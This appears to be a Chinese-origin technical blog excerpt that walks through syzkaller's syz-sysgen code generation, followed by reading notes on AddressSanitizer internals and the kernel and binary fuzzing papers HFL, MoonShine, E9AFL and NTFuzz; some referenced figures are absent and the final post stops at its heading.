The SyscallAttrs structure is defined as follows:

// SyscallAttrs represents call attributes in syzlang.
//
// This structure is the source of truth for the all other parts of the system.
// pkg/compiler uses this structure to parse descriptions.
// syz-sysgen uses this structure to generate code for executor.
//
// Only bool's and uint64's are currently supported.
//
// See docs/syscall_descriptions_syntax.md for description of individual attributes.
type SyscallAttrs struct {
    Disabled      bool
    Timeout       uint64
    ProgTimeout   uint64
    IgnoreReturn  bool
    BreaksReturns bool
}

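As the figure above shows, every field of the SyscallAttrs structure being visited (the variable attrs) has its default value 0, so every element extracted from it is 0 as well:

On each iteration the loop appends the SyscallData for the current syscall to data.Calls. The SyscallData structure produced by newSyscallData is defined as follows: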

// sys/syz-sysgen/sysgen.go
type SyscallData struct {
    Name     string      // call name in syzlang, e.g. accept$inet
    CallName string      // name of the real syscall, e.g. accept
    NR       int32       // syscall number, e.g. 30
    NeedCall bool        // flag used later when generating syz-executor source; discussed below
    Attrs    []uint64    // SyscallAttrs values extracted from the syzlang description
}

Once the loop is done, generateExecutorSyscalls sorts the data.Calls slice built above and returns data.

4. writeExecutorSyscalls

Purpose: this function generates the C header files used by syz-executor.

Reading through the code, it is easy to see that it fills in two C templates and writes the results to executor/defs.h and executor/syscalls.h.

func writeExecutorSyscalls(data *ExecutorData) {
    osutil.MkdirAll(filepath.Join(*outDir, "executor"))
    sort.Slice(data.OSes, func(i, j int) bool {
        return data.OSes[i].GOOS < data.OSes[j].GOOS
    })
    buf := new(bytes.Buffer)
    if err := defsTempl.Execute(buf, data); err != nil {
        tool.Failf("failed to execute defs template: %v", err)
    }
    writeFile(filepath.Join(*outDir, "executor", "defs.h"), buf.Bytes())
    buf.Reset()
    if err := syscallsTempl.Execute(buf, data); err != nil {
        tool.Failf("failed to execute syscalls template: %v", err)
    }
    writeFile(filepath.Join(*outDir, "executor", "syscalls.h"), buf.Bytes())
}

The defsTempl template is:

var defsTempl = template.Must(template.New("").Parse(`// AUTOGENERATED FILE

struct call_attrs_t { {{range $attr := $.CallAttrs}}
    uint64_t {{$attr}};{{end}}
};

struct call_props_t { {{range $attr := $.CallProps}}
    {{$attr.Type}} {{$attr.Name}};{{end}}
};

#define read_call_props_t(var, reader) { \{{range $attr := $.CallProps}}
    (var).{{$attr.Name}} = ({{$attr.Type}})(reader); \{{end}}
}

{{range $os := $.OSes}}
#if GOOS_{{$os.GOOS}}
#define GOOS "{{$os.GOOS}}"
{{range $arch := $os.Archs}}
#if GOARCH_{{$arch.GOARCH}}
#define GOARCH "{{.GOARCH}}"
#define SYZ_REVISION "{{.Revision}}"
#define SYZ_EXECUTOR_USES_FORK_SERVER {{.ForkServer}}
#define SYZ_EXECUTOR_USES_SHMEM {{.Shmem}}
#define SYZ_PAGE_SIZE {{.PageSize}}
#define SYZ_NUM_PAGES {{.NumPages}}
#define SYZ_DATA_OFFSET {{.DataOffset}}
#endif
{{end}}
#endif
{{end}}
`))

The template is a bit hard to read because C macros are mixed with template directives, so let's look directly at the generated executor/defs.h:

// AUTOGENERATED FILE

struct call_attrs_t { 
    uint64_t disabled;
    uint64_t timeout;
    uint64_t prog_timeout;
    uint64_t ignore_return;
    uint64_t breaks_returns;
};

struct call_props_t { 
    int fail_nth;
};

#define read_call_props_t(var, reader) { \
    (var).fail_nth = (int)(reader); \
}


#if GOOS_akaros
#define GOOS "akaros"

#if GOARCH_amd64
#define GOARCH "amd64"
#define SYZ_REVISION "361c8bb8e04aa58189bcdd153dc08078d629c0b5"
#define SYZ_EXECUTOR_USES_FORK_SERVER 1
#define SYZ_EXECUTOR_USES_SHMEM 0
#define SYZ_PAGE_SIZE 4096
#define SYZ_NUM_PAGES 4096
#define SYZ_DATA_OFFSET 536870912
#endif

#endif

    ...
        
#if GOOS_linux
#define GOOS "linux"
   ...
#if GOARCH_amd64
#define GOARCH "amd64"
#define SYZ_REVISION "e61403f96ca19fc071d8e9c946b2259a2804c68e"
#define SYZ_EXECUTOR_USES_FORK_SERVER 1
#define SYZ_EXECUTOR_USES_SHMEM 1
#define SYZ_PAGE_SIZE 4096
#define SYZ_NUM_PAGES 4096
#define SYZ_DATA_OFFSET 536870912
#endif
    ...
#endif
    ...
        
#if GOOS_windows
#define GOOS "windows"

#if GOARCH_amd64
#define GOARCH "amd64"
#define SYZ_REVISION "8967babc353ed00daaa6992068d3044bad9d29fa"
#define SYZ_EXECUTOR_USES_FORK_SERVER 0
#define SYZ_EXECUTOR_USES_SHMEM 0
#define SYZ_PAGE_SIZE 4096
#define SYZ_NUM_PAGES 4096
#define SYZ_DATA_OFFSET 536870912
#endif

#endif

As we can see, syz-sysgen exports the ArchData produced earlier by generateExecutorSyscalls to executor/defs.h for the later build of syz-executor. The ArchData of every OS and architecture goes into this single file, and preprocessor macros select which part is active.
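
For readers who have not used Go's text/template package, the following reduced sketch shows how nested range blocks turn a slice of structures into guarded C definitions. The types osData and archData and the function render are hypothetical and much smaller than the real ExecutorData; the template is a simplification in the spirit of defsTempl, not a copy of it.

```go
package main

import (
	"bytes"
	"fmt"
	"text/template"
)

// archData and osData are hypothetical, trimmed-down versions of the
// structures that syz-sysgen feeds to its templates.
type archData struct {
	GOARCH   string
	PageSize uint64
}

type osData struct {
	GOOS  string
	Archs []archData
}

// The outer range walks the OS list, the inner range walks the archs of
// the current OS; everything outside {{...}} is copied verbatim.
var tmpl = template.Must(template.New("").Parse(`{{range $os := .}}#if GOOS_{{$os.GOOS}}
{{range $arch := $os.Archs}}#if GOARCH_{{$arch.GOARCH}}
#define SYZ_PAGE_SIZE {{$arch.PageSize}}
#endif
{{end}}#endif
{{end}}`))

// render executes the template and returns the generated header text.
func render(oses []osData) (string, error) {
	buf := new(bytes.Buffer)
	if err := tmpl.Execute(buf, oses); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	out, err := render([]osData{
		{GOOS: "linux", Archs: []archData{{GOARCH: "amd64", PageSize: 4096}}},
	})
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
}
```

Because every OS and arch block is wrapped in its own #if, a single generated header can serve every build of the executor.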

The other template, syscallsTempl, is:

// nolint: lll
var syscallsTempl = template.Must(template.New("").Parse(`// AUTOGENERATED FILE
// clang-format off
{{range $os := $.OSes}}
#if GOOS_{{$os.GOOS}}
{{range $arch := $os.Archs}}
#if GOARCH_{{$arch.GOARCH}}
const call_t syscalls[] = {
{{range $c := $arch.Calls}}    {"{{$c.Name}}", {{$c.NR}}{{if or $c.Attrs $c.NeedCall}}, { {{- range $attr := $c.Attrs}}{{$attr}}, {{end}}}{{end}}{{if $c.NeedCall}}, (syscall_t){{$c.CallName}}{{end}}},
{{end}}};
#endif
{{end}}
#endif
{{end}}
`))

This is still somewhat hard to read at first glance, so let's look at an excerpt of executor/syscalls.h:

...
#if GOOS_linux
...
#if GOARCH_amd64
const call_t syscalls[] = {
    {"accept", 43},
    {"accept$alg", 43},
    {"accept$ax25", 43},
    {"accept$inet", 43},
    {"accept$inet6", 43},
    {"accept$netrom", 43},
    {"accept$nfc_llcp", 43},
    ....,
    {"bind", 49},
    {"bind$802154_dgram", 49},
    {"bind$802154_raw", 49},
    {"bind$alg", 49},
    {"bind$ax25", 49},
    {"bind$bt_hci", 49},
    {"bind$bt_l2cap", 49},
    ....
    {"prctl$PR_CAPBSET_DROP", 167, {0, 0, 0, 1, 1, }},
    {"prctl$PR_CAPBSET_READ", 167, {0, 0, 0, 1, 1, }},
    {"prctl$PR_CAP_AMBIENT", 167, {0, 0, 0, 1, 1, }},
    ....
}
#endif
...
#endif
...

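As we can see, executor/syscalls.h stores the mapping between each syscall name declared in syzlang and its syscall number, along with the attribute values when there are any. Again, macros select the syscalls table for a given OS and arch.

Here is the SyscallData definition once more: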

type SyscallData struct {
    Name     string
    CallName string
    NR       int32
    NeedCall bool
    Attrs    []uint64
}

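5. Summary

After syz-extract has generated the .const mapping files for the syzlang descriptions, syz-sysgen uses these tables to fully parse the syzlang source and obtain the declared type information and syscall argument dependencies.

When all of this has been collected, syz-sysgen serializes it into Go files for later use by syz-fuzzer. In addition, it creates executor/defs.h and executor/syscalls.h, exporting part of the information as C headers used when building syz-executor.

In short, syz-sysgen parses the syzlang files and prepares for building and running syz-fuzzer and syz-executor.

The VS Code launch.json used for debugging: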

{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "syzgenLaunch",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "${fileDirname}",
            "env": {},
            "cwd": "/usr/class/syzkaller",
            "args": ["-src", "/usr/class/syzkaller", "-out", "/tmp"] 
        }
    ]
}

Paper Reading Notes - 1

2022-03-06T16:00:00.000Z

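Introduction

This post collects scattered notes taken while reading papers and code.

Given time constraints and priorities, only the more important points are written down rather than a complete record, so each note is fairly short.

I originally planned to put these notes into my weekly reports, but that would clutter their layout, so I decided to give them a post of their own.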

一、Address Sanitizer LLVM 3.1

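Notes from reading the earliest Address Sanitizer source code, from LLVM 3.1.

ASan uses a coarse-grained mapping of 8 bytes of memory to 1 shadow byte. Every piece of virtual memory has a corresponding piece of shadow memory.
The 8-byte granularity is used because addresses returned by malloc are 8-byte aligned.
The value of a shadow byte says that the first n bytes of the corresponding original memory are addressable.
At the end of the LLVM pass pipeline, ASan instruments every memory read and write to check whether the shadow byte of the accessed address marks it as addressable. If not, the program aborts immediately.
For overflow detection, ASan places a fixed-size redzone on both sides of each piece of user memory and poisons the shadow memory of the redzones, so any access to a redzone triggers ASan.
Poisoning means marking the shadow memory of a piece of user memory as inaccessible.
For stack memory, it first allocates a block of size original stack size + (number of variables to protect + 1) * redzone size, then rewrites the offsets of the alloca instructions of those variables (function poisonStackInFunction).
It then stores some information about the stack in the leftmost redzone of the current frame.
At function entry it inserts code that poisons the redzones of the current frame, and before every ret it inserts code that unpoisons them.
If the current function calls a noreturn function (such as exit or execve), the stack must be unpoisoned before that call to avoid false positives. Noreturn calls are handled because otherwise the poison left on the stack would never be cleaned up after the call.
Note that for global variables ASan only adds a redzone on the right side (function insertGlobalRedzones).
Also, although the redzones of globals are added by instrumentation, the poisoning and unpoisoning of globals happens in the runtime.
ASan hooks memcpy and other memory and string library functions to improve detection (function InitializeAsanInterceptors).
Besides out-of-bounds reads and writes, ASan also detects UAF and use after return.
- UAF
  ASan hooks malloc, free, realloc and related functions and implements its own memory allocator, which unpoisons memory on allocation and poisons it on free.
  Dynamically allocated memory has three main states: available, quarantined, and allocated. When a chunk is freed it is put in the quarantined state and placed in the quarantine queue. Once the queue exceeds a threshold, quarantined chunks are returned to the pool of available memory. This lengthens the time between freeing a chunk and reallocating it, widening the window in which a UAF can be detected.
- use after return
  Before replacing the original allocas of a frame with the new one, ASan allocates a fake stack and uses its address as the replacement. Local variables with redzones therefore live on the fake stack rather than on the original stack.
  When the function finishes, the fake stack is poisoned again; note that it is not reclaimed at this point.
  So when is a fake stack reclaimed? When another fake stack is allocated. The allocation walks the call stack of fake stacks and, for each one, checks whether its real_stack address is greater than the current runtime stack. If it is, that fake stack is no longer in use and is released.
The first version of ASan has limitations: for example, it does not detect overflows into the alignment padding between struct members, nor overflows that land in another valid piece of user memory. Overall, though, it works very well.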
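
The shadow byte check described in these notes can be modeled in a few lines. This is a toy sketch under simplifying assumptions: the shadow memory is a Go map instead of a region at a fixed offset, any negative shadow value means "fully poisoned", and an access never crosses an 8-byte granule. The names shadow and accessOK are invented for the example.

```go
package main

import "fmt"

// shadowScale is log2 of the granule size: 8 application bytes per shadow byte.
const shadowScale = 3

// shadow is a toy shadow memory indexed by addr >> shadowScale.
//   0      all 8 bytes of the granule are addressable
//   1..7   only the first k bytes are addressable
//   < 0    the whole granule is poisoned (for example a redzone)
type shadow map[uint64]int8

// accessOK reports whether an access of size bytes at addr is allowed.
// It assumes size <= 8 and that the access stays inside one granule.
func (s shadow) accessOK(addr, size uint64) bool {
	k := s[addr>>shadowScale]
	if k == 0 {
		return true
	}
	if k < 0 {
		return false
	}
	// Partially addressable granule: the last accessed byte must be
	// among the first k bytes.
	return (addr&7)+size <= uint64(k)
}

func main() {
	s := shadow{0: 0, 1: 5, 2: -1} // granules at 0..7, 8..15 and 16..23
	fmt.Println(s.accessOK(0, 8))  // fully addressable granule
	fmt.Println(s.accessOK(8, 4))  // bytes 0..3 of a granule with k = 5
	fmt.Println(s.accessOK(12, 4)) // bytes 4..7 of the same granule
	fmt.Println(s.accessOK(16, 1)) // poisoned granule
}
```

In the real tool the shadow address is computed from the application address with a shift plus a fixed offset, and the check is emitted inline before each load and store; the map only keeps the sketch self-contained.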

Thanks to sad for sharing these notes.

二、HFL: Hybrid Fuzzing on the Linux Kernel

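The paper HFL: Hybrid Fuzzing on the Linux Kernel combines fuzzing with symbolic execution and mainly addresses three problems:

Indirect control flow determined by syscall arguments makes symbolic execution inefficient, mainly in cases like these:
- Random fuzzing cannot efficiently handle cases where the index into a function pointer table comes from an argument.
- In symbolic execution, indexing a function table with a symbol can lead to a symbolic dereference, and the engine would also have to explore the symbol's whole value space.
Solution: an offline translator built on the kernel source converts indirect control flow into direct control flow at compile time.
Syscall sequences and dependencies must be inferred in order to control and match internal system state; otherwise fuzzing is inefficient.
Solution:
1. First, static analysis (mostly pointer analysis, presumably) collects, across multiple syscalls, a set of candidate read/write pairs that access the same memory location. The read and the write are separate: one syscall writes and another syscall reads.
2. These candidates are then validated at runtime. Static analysis produces false positives, so during execution HFL checks whether a read/write pair really accesses the same memory location; if so, the candidate is a true dependency pair.
  The writing syscall must also come before the reading one, since a value can only be read after it has been written.
3. Symbolic execution is used to determine dependencies between syscall arguments, for example that an argument of syscall2 equals some argument of syscall1. The workflow figure below shows the details.
The workflow is as follows:
The nested argument types used to invoke syscalls must be inferred. The usual approach is used here: calls to copy_from_user are tracked to detect nested syscall arguments. This needs little explanation; a picture is worth a thousand words.

Besides these three problems, the timing of switching between fuzzing and symbolic execution also matters in hybrid fuzzing. The fuzzer maintains a frequency table that counts how often each branch evaluates to true or false. I find this design quite interesting, but the site hosting the source code has been shut down and I could not find the source.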

三、MoonShine: Optimizing OS Fuzzer Seed

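Paper: MoonShine: Optimizing OS Fuzzer Seed. It explains how to extract OS fuzzer seeds from real system call traces (seed distillation) while preserving dependencies. It gives two interesting definitions of dependency. For syscalls $C_i$ and $C_j$:

Explicit dependency: if a value produced by $C_i$ is used as an argument of $C_j$, then $C_j$ depends on $C_i$, so $C_i$ must naturally be called before $C_j$.
Implicit dependency: if the execution of $C_i$ affects the execution of $C_j$ through reads and writes of shared variables, then $C_j$ depends on the execution of $C_i$.

MoonShine establishes dependencies as follows:

For explicit dependencies, MoonShine builds a dependency graph: following the call sequence, it connects syscall return values to the syscall arguments that use them.
For implicit dependencies, MoonShine analyzes the read and write sets of a pair of syscalls: if the set of global variables read by $C_i$ intersects the set of global variables written by $C_j$, the two syscalls have an implicit dependency. Note that, limited by the precision of static analysis, implicit dependencies may be over- or under-estimated.

Note that
If $C_i$ implicitly depends on $C_j$ and $C_j$ explicitly depends on $C_k$, then $C_i$ implicitly depends on $C_k$.
If $C_i$ explicitly depends on $C_j$ and $C_j$ implicitly depends on $C_k$, then $C_i$ explicitly depends on $C_k$.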
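
The two dependency definitions translate directly into two small predicates. The sketch below is only an illustration of the definitions, not MoonShine's implementation: the call record, its fields, and the variable name used in main are all hypothetical, and a return value of 0 is treated as "no result" for simplicity.

```go
package main

import "fmt"

// call is a hypothetical record of one traced syscall.
type call struct {
	Name   string
	Ret    uint64          // value produced by the call; 0 is treated as "none" here
	Args   []uint64        // argument values
	Reads  map[string]bool // kernel global variables read by the call
	Writes map[string]bool // kernel global variables written by the call
}

// explicitDep reports whether later uses, as an argument, a value that
// earlier produced.
func explicitDep(earlier, later call) bool {
	if earlier.Ret == 0 {
		return false
	}
	for _, a := range later.Args {
		if a == earlier.Ret {
			return true
		}
	}
	return false
}

// implicitDep reports whether later reads a global variable that earlier
// writes, that is, whether the read set and the write set intersect.
func implicitDep(earlier, later call) bool {
	for g := range later.Reads {
		if earlier.Writes[g] {
			return true
		}
	}
	return false
}

func main() {
	open := call{Name: "open", Ret: 3}
	read := call{Name: "read", Args: []uint64{3, 0, 16}}
	fmt.Println(explicitDep(open, read)) // read uses the descriptor returned by open

	// The variable name below is made up for the example.
	setter := call{Name: "setter", Writes: map[string]bool{"some_global": true}}
	getter := call{Name: "getter", Reads: map[string]bool{"some_global": true}}
	fmt.Println(implicitDep(setter, getter))
}
```

In practice the read and write sets come from static analysis of the kernel, which is where the over- and under-estimation mentioned above originates.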

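The algorithm's pseudocode is shown below; it is fairly easy to follow:

The overall idea of the algorithm is:

First, sort the syscalls by coverage, so that syscalls with higher coverage are handled first.
Then walk the syscall sequence, collect the implicit and explicit dependencies of each call, and add them to the corpus sequence.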

四、Scalable Fuzzing of Program Binaries with E9AFL

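Notes on the paper Scalable Fuzzing of Program Binaries with E9AFL:

e9afl is a tool that instruments stripped binaries to provide coverage feedback; the instrumented program can be fuzzed directly with AFL. Compared with other approaches to fuzzing pure binaries, its advantage is that the instrumentation overhead stays low while precision stays high.

The instrumentation process has three main steps:

Design the trampoline template to insert. There is not much to say here; it essentially mirrors AFL's instrumentation:
Runtime injection. This step injects the fork server, shared memory initialization, and similar code into the binary so that they run before main.
Determine the set of instructions to instrument. e9afl implements its own lightweight control flow analysis to find all possible jump targets, both direct and indirect. Indirect targets are found by analyzing jump tables in the data segments and pointers to code.
Interestingly, although static control flow analysis may be imprecise (finding too many or too few jump targets), these errors do not have much impact on the overall fuzzing process.

Note that if e9afl only inserted trampolines without optimizing them, the program would run very slowly. The fork server speeds up program startup, but the forked child processes trigger a large number of page faults. The children frequently execute trampolines, and each first access faults on the page that holds the trampoline.

Page faults are the key factor limiting e9afl's performance, so they need to be optimized. The paper proposes three optimization strategies:

trampoline ordering
Allocate trampoline memory in the same order as the patched instructions.
What does that mean? My understanding is this: for one region of code (say, a function), e9afl tries to place all trampolines used by that function in a single page or in one compact group of pages. In other words, instructions whose patch points are adjacent should have adjacent trampolines.
The reasoning is that most trampolines of a function are likely to be executed once the function runs. If they are all placed together, the first trampoline (trampoline1) triggers a page fault as usual, but the next one (trampoline2) does not, because trampoline1 and trampoline2 are in the same memory region.
instruction selection
The previous strategy does not always work, for example when patching relies on instruction punning, which limits the trampoline addresses that can be reached. This strategy tries to instrument other positions in the basic block rather than only its first instruction: e9afl searches the same basic block for another instruction of at least 5 bytes and instruments that instruction instead.
bad block elimination
If neither of the two optimizations above can be applied, the trampoline will very likely trigger a page fault and slow down fuzzing. This step therefore focuses on removing unnecessary trampolines.
For example, if every path through BasicBlockA also goes through BasicBlockB, it is enough to record coverage for one of the two blocks. This is the path differentiation problem.
Note: e9afl calls basic blocks to which the two optimizations above cannot be applied bad blocks; the others are good blocks.
Here e9afl concentrates on removing the instrumentation of bad blocks, as follows:
1. Initially, label every basic block according to these rules:
  1. every good block starts as unoptimized
  2. every bad block that may be an indirect jump target starts as unoptimized
  3. all other bad blocks start as optimized
2. Next, try to solve the path differentiation problem. Consider any sub-path $\sigma$ that satisfies both conditions:
  1. its pair of (endpoint) basic blocks is unoptimized
  2. all basic blocks in between are optimized
  If at least two such sub-paths $\sigma_1$ and $\sigma_2$ exist for the same pair, the path differentiation property is violated and must be repaired.
  The repair greedily changes optimized basic blocks on $\sigma_1$ and $\sigma_2$ to unoptimized, repeating the process until no sub-path violates the property.

Finally, the evaluation of e9afl: the results are quite good, and e9afl can also handle large binaries such as chrome: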

五、NTFUZZ: Enabling Type-Aware Kernel Fuzzing on Windows with Static Binary Analysis

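The NTFuzz paper proposes an interesting approach:

Static analysis is used to propagate the argument type information of documented user-level API functions to the arguments of undocumented system calls, bridging the information gap between the two.

In general:

A fuzzer can hardly fuzz well or trigger bugs without argument type information.
Undocumented system calls are usually reachable from documented API functions.
Although API functions eventually make system calls, fuzzing at the API level is unlikely to trigger bugs, probably because the API functions filter their arguments beforehand.

Below is the architecture of NTFuzz, which consists of two main parts, the static analyzer and the dynamic kernel fuzzer:

The key component is the Modular Analyzer inside the static analyzer, which uses a function as its basic unit of analysis. Its basic algorithm is:

The inputs are the CFGs, the call graph, and the API descriptions. The call graph is topologically sorted and the functions are visited bottom-up (callees first, then callers). This way, when a function higher in the call graph is analyzed, the summaries of the lower functions can be reused directly, which reduces analysis time. Each summarize step records the syscalls the function invokes and the changes it makes to the memory state.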
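
The bottom-up visiting order can be obtained with a post-order depth-first traversal of the call graph. The sketch below is a generic illustration rather than NTFuzz's algorithm: bottomUp and the sample graph are invented for the example, and edges that would re-enter a function currently being visited (recursion) are simply skipped.

```go
package main

import "fmt"

// bottomUp returns the functions reachable from roots in an order where
// every callee appears before its callers. Recursive back edges are ignored.
func bottomUp(callGraph map[string][]string, roots []string) []string {
	const (
		unvisited = iota
		inProgress
		done
	)
	state := make(map[string]int)
	var order []string
	var visit func(fn string)
	visit = func(fn string) {
		if state[fn] != unvisited {
			return // already summarized, or a recursive back edge
		}
		state[fn] = inProgress
		for _, callee := range callGraph[fn] {
			visit(callee)
		}
		state[fn] = done
		order = append(order, fn) // emitted only after all callees
	}
	for _, r := range roots {
		visit(r)
	}
	return order
}

func main() {
	// Hypothetical call graph: an API function, a helper, and a syscall stub.
	g := map[string][]string{
		"API":    {"helper", "stub"},
		"helper": {"stub"},
		"stub":   nil,
	}
	fmt.Println(bottomUp(g, []string{"API"})) // prints [stub helper API]
}
```

With this order, the summary of stub is available when helper is analyzed, and both are available when API is analyzed.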

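This visiting order cannot handle recursive calls or indirect calls, so NTFuzz simply skips them. In addition, the static analyzer must be able to:

Track data flow across functions.
Track memory state across procedures. For example, a memory location may be modified in one function and then used in another, and such uses must be traceable.

Now let's look closely at the three parts of the static analyzer:

Front-end
The front-end does a few things: it reads the API descriptions, and it lifts the binary into basic IR statements and builds the CFGs. The API descriptions mainly come from the Windows SDK, whose structured annotations also provide NTFuzz with good type information. The resulting IR omits many opcodes that are unrelated to type information or memory state changes and keeps only a few important ones:
Interestingly, unary operators and branch instructions are among the omitted ones. This may be because unary operators usually do not modify memory, and branch information is already captured by the edges of the CFG.
To keep the call graph small, NTFuzz starts from the syscall stub functions that contain a sysenter instruction and walks upward through their callers until it reaches the first documented API function. The set of functions found this way is called S1. Analyzing S1 alone is not enough, because it does not include other functions that are called from S1 and may modify the memory state. So after S1 is computed, NTFuzz also collects S2, the set of all functions called by functions in S1. S1 + S2 is the set of target functions that NTFuzz analyzes statically.
Modular Analyzer
This subsection is the most important part of the whole paper.
This part runs the summarize operation on each target function in turn. Overall, this stage uses flow-sensitive static analysis, which also helps pointer analysis. As mentioned earlier, it records the argument values each function passes to syscalls (these values are abstract, not concrete) and how the memory state changes between function entry and exit. Concretely, it has two parts: the abstract domain and the abstract semantics.
The abstract domain, as I understand it, specifies the range that variables or values may take when a function summary is extracted. The main abstract domains defined are the following:
At first glance this looks rather complicated (and it really is when you first encounter it), so it has to be worked through piece by piece.
1. The set Z is the set of integers (the Z from high school mathematics).
2. The set I is the set of abstract integers. First, the notion of a symbol: each function argument introduces a new symbol. During static analysis the concrete argument values of a call are unknown, so a symbol stands in for them, much as in symbolic execution. For example: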
  int func(int a) {
    int b = a * 3 + 1;
    return b;
  }
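  Here, during static analysis, we can roughly treat the value of parameter a as a symbol $\alpha$, so the value of variable b is $\alpha * 3 + 1$.
  A symbolic integer can therefore be written in the form $a*symbol+b$. When a is 0 it denotes a concrete integer; when a is nonzero it denotes a symbolic integer.
  Interestingly, the abstract integer set I is the set of symbolic integers joined with two extra elements, $\bot$ (bottom) and $\top$ (top), where
  - $\bot$ stands for integers that carry no meaning for the analysis.
  - $\top$ stands for an arbitrary integer.
  The paper gives the rules for adding $\bot$ and $\top$ to an ordinary integer:
  Since $\bot$ carries no analytical meaning, adding $\bot$ to a meaningful i keeps i.
  Since $\top$ stands for any integer, adding it to another integer still gives an arbitrary integer, that is, $\top$.
  My guess is that the result of this addition favors the more informative operand, with a priority of roughly $\top > i > \bot$.
  Next, a quick look at the result of adding two symbolic integers:
  Only under very restricted conditions does the sum of two symbolic integers have a definite result; otherwise the set of possible results is too large and is represented by $\top$.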
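3. The set V is the abstraction of a value in a function. Three components determine the properties of a variable: the abstract value (which numbers it may take), the abstract locations (where the variable is stored), and the abstract types (which types the value may have). A particular abstract value in V is a triple: its numeric component is an element of I, its location component is a subset of L (an element of the power set of L), and its type component is a subset of T (an element of the power set of T).
  So the whole set of abstract values is V = I x $2^L$ x $2^T$.
  Note that $2^T$ denotes the power set of T.
  Memory locations are represented by an element of the power set because, during static analysis, a pointer may point to several memory locations; the same holds for types.
4. The set L is the set of abstract memory locations. An abstract memory location can be one of the following:
  1. A fixed location in the global data area, so $Global(Z)$ denotes the set of all possible global variables.
  2. A fixed location on the stack. The pair (f, o) denotes the location at offset o in the stack frame of function f, so $Stack(function\space *\space Z)$ denotes the set of all possible stack locations. The heap is handled the same way, except that a heap location is written (a, o), meaning offset o relative to address a.
    All of the above are locations that are relatively fixed during static analysis.
  3. Besides those, one more kind of location has to be considered: the location at offset o from a symbolic pointer s, written SymLoc(s, o).
5. The set T is the set of type constraints. The type of a variable is either a concrete type or the same as the type of some symbol. Note that this is a set of constraints, so an empty constraint set means the value may have any type.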
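To make the abstract integer set I from item 2 more concrete, here is a minimal Python sketch. The handling of $\bot$ and $\top$ follows the rules described above. The rule for adding two symbolic integers is my own assumption, since the figure with the exact rules is not reproduced here: the sum stays precise only when one operand is concrete or both use the same symbol, and falls back to $\top$ otherwise. All names (`SymInt`, `BOT`, `TOP`, `add`) are hypothetical.

```python
from dataclasses import dataclass
from typing import Optional

BOT = "BOT"  # bottom: no meaningful value for the analysis
TOP = "TOP"  # top: any integer


@dataclass(frozen=True)
class SymInt:
    a: int               # coefficient; 0 means a concrete integer
    sym: Optional[str]   # symbol name, None when a == 0
    b: int               # constant term


def const(n):
    return SymInt(0, None, n)


def add(x, y):
    # TOP absorbs everything, BOT is dropped in favour of the other operand.
    if x == TOP or y == TOP:
        return TOP
    if x == BOT:
        return y
    if y == BOT:
        return x
    # Concrete + anything: only the constant term changes.
    if x.a == 0:
        return SymInt(y.a, y.sym, x.b + y.b)
    if y.a == 0:
        return SymInt(x.a, x.sym, x.b + y.b)
    # Assumed rule: same symbol stays precise, different symbols give TOP.
    if x.sym == y.sym:
        a = x.a + y.a
        return SymInt(a, x.sym if a != 0 else None, x.b + y.b)
    return TOP


alpha = SymInt(1, "alpha", 0)
# b = a * 3 + 1, written as three additions of alpha plus the constant 1
b = add(add(add(alpha, alpha), alpha), const(1))
print(b)
```

The example reproduces the `func` case above: the parameter is the symbol alpha and the returned value is 3 * alpha + 1.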
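Abstract Semantics: as I understand it, this describes what each expr or stmt actually does. To follow it, first recall the IR introduced earlier:
Now let's try to understand the evaluation of expr, one rule at a time:
Here $V$ takes an $expr$ and, under the abstract state $S$, returns the Abstract Value it denotes.
First, what is the abstract state S?
It is easy to see that the abstract state S is a pair: a mapping from registers to V, and a mapping from memory locations L to V. Put simply, a State holds everything about values, namely the value of every register and the value at every memory location.
We therefore write S[0] for the register mapping R under state S, and S[1] for the memory mapping M under state S.
- $V(reg)(S)$: this rule is easy to read. Given a reg under state S, it takes the register mapping R of S (that is, S[0]) and looks up reg as the key.
- $V([e])(S)$: given an expression $e$ under state S, it returns the value stored at the memory locations that e denotes. The right-hand side has to be read in pieces. First we get the Abstract Value of e, namely $V(e)(S)$. That Abstract Value is a triple whose field at index 1 (counting from 0) is the Memory Location component, so $V(e)(S)[1]$ is the set of all memory locations of e. Finally, the rule reads every one of those locations under state S: $\bigcup \{S[1][l] \mid l \in V(e)(S)[1]\}$
- $V(i)(S)$: the Abstract Value of an integer expression $i$ under state S.
  - When $i=0$, we cannot tell whether i is the integer 0 or the null pointer NULL, so its type constraint is simply ignored.
  - When $i \in DataSection$, i is certainly a pointer to a global variable. Its numeric value is not what we care about, so it is represented by $\bot$.
  - Otherwise i is treated as an ordinary integer.
- $V(e_1*e_2)(S)$: the value of a binary operation under state S. One special case: when an array element is accessed, the Memory Location of that element is set to the Array Base Memory Location rather than the exact element location. This prevents an explosion of memory locations caused by an explosion of index ranges.
Next, let's try to understand the evaluation of Stmt:
Here $m[k \rightarrow v]$ denotes a strong update of m that maps k to v; an arrow with a w on top denotes a weak update. With the expr rules understood, the Put, Store, and update primitives are easy to follow, so I will not go through them. The Call primitive needs extra handling, because the called function may have side effects (such as modifying memory).
A function's side effect is defined as a pair that records which arguments lead to which memory modifications:
The apply operation then applies the Update Set of the Side Effect to the state S:
The apply primitive contains an inverted-L symbol. As I understand it, it maps the value at a memory location as seen by one function to a memory location as seen by another function. That is a mouthful, so here is a simple example: the caller has a variable at $STACK(caller, -0x40)$, and the callee accesses $STACK(callee, -0x80)$ (the caller's local variable). The two functions appear to use different memory locations, but both refer to the same location, so a substitution is needed. The inverted-L symbol performs exactly this substitution.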
Type Inferrer
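The type inferrer uses the summaries produced in the previous step to infer types. The hard parts are struct types and array types.
First, struct type inference. For a struct on the heap, the Inferrer can derive it from the state of the corresponding heap chunk. For a struct on the stack, however, there is no implicit boundary information as there is for a heap chunk, so its fields may be mistaken for separate local variables, and it is hard to tell which fields belong to the stack struct:
NTFuzz proposes a heuristic here: use the memory access pattern within the function to decide whether a stack variable is part of a struct.
In plain terms, if an adjacent stack variable is never used after being initialized, it is part of a stack struct that will be passed to a syscall; if such a variable is not even initialized, it will be initialized by the syscall.
Second, array type inference. An array type has two parts: the element type and the array size. The element type can be obtained from the documented API. The array size can be obtained from SAL annotations or from a size parameter of the API, and also by observing memory allocation patterns.
A fair number of APIs take both an array pointer and an array size as parameters, so the size can be recovered by analyzing those APIs.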

Paper Notes: Binary Rewriting without Control Flow Recovery

2022-02-24T16:00:00.000Z

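I. Overview

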